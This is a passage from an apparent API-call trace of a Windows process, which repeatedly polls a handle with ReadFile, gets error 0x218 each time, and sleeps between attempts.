	[0220.679] Sleep (dwMilliseconds=0xa) 
	[0220.726] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.726] GetLastError () returned 0x218
	[0220.726] Sleep (dwMilliseconds=0xa) 
	[0220.771] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.771] GetLastError () returned 0x218
	[0220.771] Sleep (dwMilliseconds=0xa) 
	[0220.858] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.858] GetLastError () returned 0x218
	[0220.858] Sleep (dwMilliseconds=0xa) 
	[0220.868] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.868] GetLastError () returned 0x218
	[0220.868] Sleep (dwMilliseconds=0xa) 
	[0220.881] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.881] GetLastError () returned 0x218
	[0220.881] Sleep (dwMilliseconds=0xa) 
	[0220.898] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.898] GetLastError () returned 0x218
	[0220.898] Sleep (dwMilliseconds=0xa) 
	[0220.912] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.912] GetLastError () returned 0x218
	[0220.913] Sleep (dwMilliseconds=0xa) 
	[0220.928] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.928] GetLastError () returned 0x218
	[0220.928] Sleep (dwMilliseconds=0xa) 
	[0220.945] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.945] GetLastError () returned 0x218
	[0220.945] Sleep (dwMilliseconds=0xa) 
	[0220.959] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0220.959] GetLastError () returned 0x218
	[0220.959] Sleep (dwMilliseconds=0xa) 
	[0221.006] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.006] GetLastError () returned 0x218
	[0221.006] Sleep (dwMilliseconds=0xa) 
	[0221.039] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.039] GetLastError () returned 0x218
	[0221.039] Sleep (dwMilliseconds=0xa) 
	[0221.075] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.075] GetLastError () returned 0x218
	[0221.075] Sleep (dwMilliseconds=0xa) 
	[0221.084] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.084] GetLastError () returned 0x218
	[0221.084] Sleep (dwMilliseconds=0xa) 
	[0221.100] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.100] GetLastError () returned 0x218
	[0221.100] Sleep (dwMilliseconds=0xa) 
	[0221.115] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.115] GetLastError () returned 0x218
	[0221.115] Sleep (dwMilliseconds=0xa) 
	[0221.131] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.131] GetLastError () returned 0x218
	[0221.131] Sleep (dwMilliseconds=0xa) 
	[0221.146] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.147] GetLastError () returned 0x218
	[0221.147] Sleep (dwMilliseconds=0xa) 
	[0221.163] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.163] GetLastError () returned 0x218
	[0221.163] Sleep (dwMilliseconds=0xa) 
	[0221.178] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.178] GetLastError () returned 0x218
	[0221.178] Sleep (dwMilliseconds=0xa) 
	[0221.225] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.225] GetLastError () returned 0x218
	[0221.225] Sleep (dwMilliseconds=0xa) 
	[0221.272] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.272] GetLastError () returned 0x218
	[0221.272] Sleep (dwMilliseconds=0xa) 
	[0221.310] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0221.310] GetLastError () returned 0x218
	[0221.310] Sleep (dwMilliseconds=0x3e8) 
	[0222.319] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0222.319] Sleep (dwMilliseconds=0xa) 
	[0222.333] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.333] GetLastError () returned 0x218
	[0222.333] Sleep (dwMilliseconds=0xa) 
	[0222.349] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.349] GetLastError () returned 0x218
	[0222.349] Sleep (dwMilliseconds=0xa) 
	[0222.395] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.395] GetLastError () returned 0x218
	[0222.395] Sleep (dwMilliseconds=0xa) 
	[0222.451] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.451] GetLastError () returned 0x218
	[0222.451] Sleep (dwMilliseconds=0xa) 
	[0222.482] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.482] GetLastError () returned 0x218
	[0222.482] Sleep (dwMilliseconds=0xa) 
	[0222.488] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.488] GetLastError () returned 0x218
	[0222.488] Sleep (dwMilliseconds=0xa) 
	[0222.504] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.504] GetLastError () returned 0x218
	[0222.504] Sleep (dwMilliseconds=0xa) 
	[0222.519] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.519] GetLastError () returned 0x218
	[0222.519] Sleep (dwMilliseconds=0xa) 
	[0222.535] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.535] GetLastError () returned 0x218
	[0222.535] Sleep (dwMilliseconds=0xa) 
	[0222.551] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.552] GetLastError () returned 0x218
	[0222.552] Sleep (dwMilliseconds=0xa) 
	[0222.566] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.566] GetLastError () returned 0x218
	[0222.566] Sleep (dwMilliseconds=0xa) 
	[0222.582] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.582] GetLastError () returned 0x218
	[0222.582] Sleep (dwMilliseconds=0xa) 
	[0222.629] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.629] GetLastError () returned 0x218
	[0222.629] Sleep (dwMilliseconds=0xa) 
	[0222.675] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.675] GetLastError () returned 0x218
	[0222.675] Sleep (dwMilliseconds=0xa) 
	[0222.704] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.704] GetLastError () returned 0x218
	[0222.704] Sleep (dwMilliseconds=0xa) 
	[0222.707] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.707] GetLastError () returned 0x218
	[0222.707] Sleep (dwMilliseconds=0xa) 
	[0222.722] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.722] GetLastError () returned 0x218
	[0222.722] Sleep (dwMilliseconds=0xa) 
	[0222.740] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.740] GetLastError () returned 0x218
	[0222.740] Sleep (dwMilliseconds=0xa) 
	[0222.754] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.754] GetLastError () returned 0x218
	[0222.754] Sleep (dwMilliseconds=0xa) 
	[0222.770] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.770] GetLastError () returned 0x218
	[0222.770] Sleep (dwMilliseconds=0xa) 
	[0222.785] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.785] GetLastError () returned 0x218
	[0222.785] Sleep (dwMilliseconds=0xa) 
	[0222.801] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.801] GetLastError () returned 0x218
	[0222.801] Sleep (dwMilliseconds=0xa) 
	[0222.847] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.847] GetLastError () returned 0x218
	[0222.847] Sleep (dwMilliseconds=0xa) 
	[0222.906] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.906] GetLastError () returned 0x218
	[0222.906] Sleep (dwMilliseconds=0xa) 
	[0222.941] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.941] GetLastError () returned 0x218
	[0222.941] Sleep (dwMilliseconds=0xa) 
	[0222.956] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.956] GetLastError () returned 0x218
	[0222.956] Sleep (dwMilliseconds=0xa) 
	[0222.972] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.972] GetLastError () returned 0x218
	[0222.972] Sleep (dwMilliseconds=0xa) 
	[0222.988] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0222.989] GetLastError () returned 0x218
	[0222.989] Sleep (dwMilliseconds=0xa) 
	[0223.004] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.004] GetLastError () returned 0x218
	[0223.004] Sleep (dwMilliseconds=0xa) 
	[0223.020] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.020] GetLastError () returned 0x218
	[0223.020] Sleep (dwMilliseconds=0xa) 
	[0223.035] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.035] GetLastError () returned 0x218
	[0223.035] Sleep (dwMilliseconds=0xa) 
	[0223.051] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.051] GetLastError () returned 0x218
	[0223.052] Sleep (dwMilliseconds=0xa) 
	[0223.097] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.097] GetLastError () returned 0x218
	[0223.097] Sleep (dwMilliseconds=0xa) 
	[0223.159] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.159] GetLastError () returned 0x218
	[0223.159] Sleep (dwMilliseconds=0xa) 
	[0223.208] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.208] GetLastError () returned 0x218
	[0223.208] Sleep (dwMilliseconds=0xa) 
	[0223.222] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.222] GetLastError () returned 0x218
	[0223.222] Sleep (dwMilliseconds=0xa) 
	[0223.238] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.238] GetLastError () returned 0x218
	[0223.238] Sleep (dwMilliseconds=0xa) 
	[0223.253] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.253] GetLastError () returned 0x218
	[0223.253] Sleep (dwMilliseconds=0xa) 
	[0223.269] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.269] GetLastError () returned 0x218
	[0223.269] Sleep (dwMilliseconds=0xa) 
	[0223.284] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.284] GetLastError () returned 0x218
	[0223.284] Sleep (dwMilliseconds=0xa) 
	[0223.301] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.301] GetLastError () returned 0x218
	[0223.301] Sleep (dwMilliseconds=0xa) 
	[0223.316] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.316] GetLastError () returned 0x218
	[0223.317] Sleep (dwMilliseconds=0xa) 
	[0223.362] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.362] GetLastError () returned 0x218
	[0223.362] Sleep (dwMilliseconds=0xa) 
	[0223.398] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.398] GetLastError () returned 0x218
	[0223.398] Sleep (dwMilliseconds=0xa) 
	[0223.439] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.439] GetLastError () returned 0x218
	[0223.439] Sleep (dwMilliseconds=0xa) 
	[0223.452] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.452] GetLastError () returned 0x218
	[0223.452] Sleep (dwMilliseconds=0xa) 
	[0223.455] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.455] GetLastError () returned 0x218
	[0223.455] Sleep (dwMilliseconds=0xa) 
	[0223.471] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.471] GetLastError () returned 0x218
	[0223.472] Sleep (dwMilliseconds=0xa) 
	[0223.487] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.487] GetLastError () returned 0x218
	[0223.487] Sleep (dwMilliseconds=0xa) 
	[0223.503] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.503] GetLastError () returned 0x218
	[0223.503] Sleep (dwMilliseconds=0xa) 
	[0223.518] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.518] GetLastError () returned 0x218
	[0223.518] Sleep (dwMilliseconds=0xa) 
	[0223.535] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.535] GetLastError () returned 0x218
	[0223.535] Sleep (dwMilliseconds=0xa) 
	[0223.580] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.580] GetLastError () returned 0x218
	[0223.580] Sleep (dwMilliseconds=0xa) 
	[0223.627] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.627] GetLastError () returned 0x218
	[0223.627] Sleep (dwMilliseconds=0xa) 
	[0223.659] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.659] GetLastError () returned 0x218
	[0223.659] Sleep (dwMilliseconds=0xa) 
	[0223.674] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
